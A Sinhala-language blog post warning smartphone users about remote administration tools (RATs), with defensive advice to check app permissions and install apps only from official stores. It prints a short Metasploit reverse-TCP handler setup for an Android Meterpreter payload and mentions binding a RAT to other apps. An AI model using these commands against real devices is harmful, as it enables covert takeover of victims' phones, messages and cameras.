ඔබගේ smart ජංගම දුරකතනය Hacker කෙනෙකු අතට පත් විය හැකි ආකාර හා ඉන් වැලකීමට ගත හැකි ක්‍රියාමාර්ග



 අද  අපි කතා කරන්න බලාපොරොත්තු වෙන්නේ ඔබගේ ජංගම  දුරකතනය Hacker කෙනෙකු අතට පත් විය හැකි ක්‍රමයන් හා ඉන් වැලකීමට ගත යුතු ක්‍රියාමාර්ග ගැන.


මුලින් බලමු Hacker කෙනෙක්ට මේක කරන්න පුලුවන් ක්‍රමවේද ගැන


මේක කරන්න Hacker කෙනෙක් සාමාන්‍යයෙන් බාවිතා කරන්නේ Rat එකක්. ඒ කියන්නේ Remote administration tool එකක්. 


උදාහරණයක් විදිහට අපි Android මෙහෙයුම් පද්ධතියෙන්  ධාවනය වන Device එකක් ගමු. මෙතනදී හැකර් Android මෙහෙයුම් පද්දතියට අදාල වන ලෙස Rat එක සාදා ගනු ලබනවා. මෙහිදී ඔහු ඔහුගේ Ip ලිපිනය හා සම්බන්ද විය යුතු  Port එක එම Rat එකට අඩංගු කරනවා.

ඊට පස්සෙ කරන්නේ මේක Victime ගෙ අතට පත් කරන එක. මේක android වලට සීමා උන දෙයක් පමනක් නෙවෙයි Windows  Apple ඕනේම platform එකකට සිදු කරන්න හැකියාවක් තියනවා. ඉතින් දැන් අපි Victime කෙනෙක් උනා කියල හිතමු. අපි මේ Rat එක ස්ථාපනය  කරගත් සැනින් Hacker ට අපේ ජංගම දුරකතනය පාලනය කරන්න හැකියාවක් ලැබෙනවා. මෙය සිදු කරන්න පුලුවන් අපි අන්තර්ජාලයට සම්බන්ද වූ විට පමනයි. 

 අපි ස්ථාපනය කරගත් Rat එක අපි අන්තර්ජාලයට සම්බන්ද වූ සැනිනි Hacker ඇතුලත් කරන ලද Ip ලිපිනයට හා Port එකට සම්බන්ද (connect) වීමට උත්සාහ කරනවා.

ඉතුරු ටික තියෙන්නේ හැකර්ගෙ අතේ.   ඔහුට ඔබගේ දුරකතනයට සම්බන්ද වීමට අවශ්‍ය වන්නේ line 6  ක පුංචි Code එකක් පමනයි metasploit නම්

Use multi/handler
Set payload android/meterpreter/reverse_tcp
Set LHOST හැකර්ගෙ IP ලිපිනය
Set LPORT port එක
exploit

දැන් බලමු හැකර්ට කරන්න පුලුවන් දේවල් ගැන

ඔහුට ඔබේ

  • Message කියවන්න
  • Contact list එකට access වෙන්න
  • Camera ව පාලනය කරන්න
  • ඔයාගේ දුරකතනයෙන් messages යවන්න

 තව ගොඩක් දේවල් කරන්න පුලුවන්.

 දැන් බලමු කොහොමද මේ වාගෙ දේවලින් වැලකෙන්නේ කියලා

හරි අපි උදාහරණයක් විදිහට Android Device  එකක් ගමු. සෑම App එකක්ම ස්ථාපනය කිරීමේදී එයට අවශ්‍ය වෙන Permissions ගැන සැලකිලිමත් විය යුතුයි. මේ ක්‍රමය ගොඩක් සාර්ථක නෑ.  මොකද හැකර් කෙනෙකුට අවශ්‍ය පරදි මේ Permissions වෙනස් කරන්න පුලුවන්.

 හැකි සෑම විටම අපිට අවශ්‍ය App එක playstore.  AppStore වගේ දෙයකින් Download කරගන්න සැලකිලිමත් වෙන්න ඕනෙ.

Hacker කෙනෙකුට මෙම rat එක ඕනෑම  තවත් app එකකට bind කිරීමට අවශ්‍ය වන්නේ සරල ruby script එකක් පමණයි. ඒ නිසා අපි සෑම විටම  app ලබාගැනීමට එම app නිර්මානය කල අයගේ web අඩවිය හෝ playstore වැනි දේ බාවිත කල හොත් අපිට මෙවැනි දේ වලින් වැලකිය හැකියි.

 එහෙනම් ගිහින් එන්නම්.

- කරුනාකර කතු අයිතිය සුරකින්න -
ඔබගේ smart ජංගම දුරකතනය Hacker කෙනෙකු අතට පත් විය හැකි ආකාර හා ඉන් වැලකීමට ගත හැකි ක්‍රියාමාර්ග ඔබගේ smart ජංගම දුරකතනය Hacker කෙනෙකු අතට පත් විය හැකි ආකාර හා ඉන් වැලකීමට ගත හැකි ක්‍රියාමාර්ග Reviewed by vihan on 1:21:00 AM Rating: 5

No comments:

Powered by Blogger.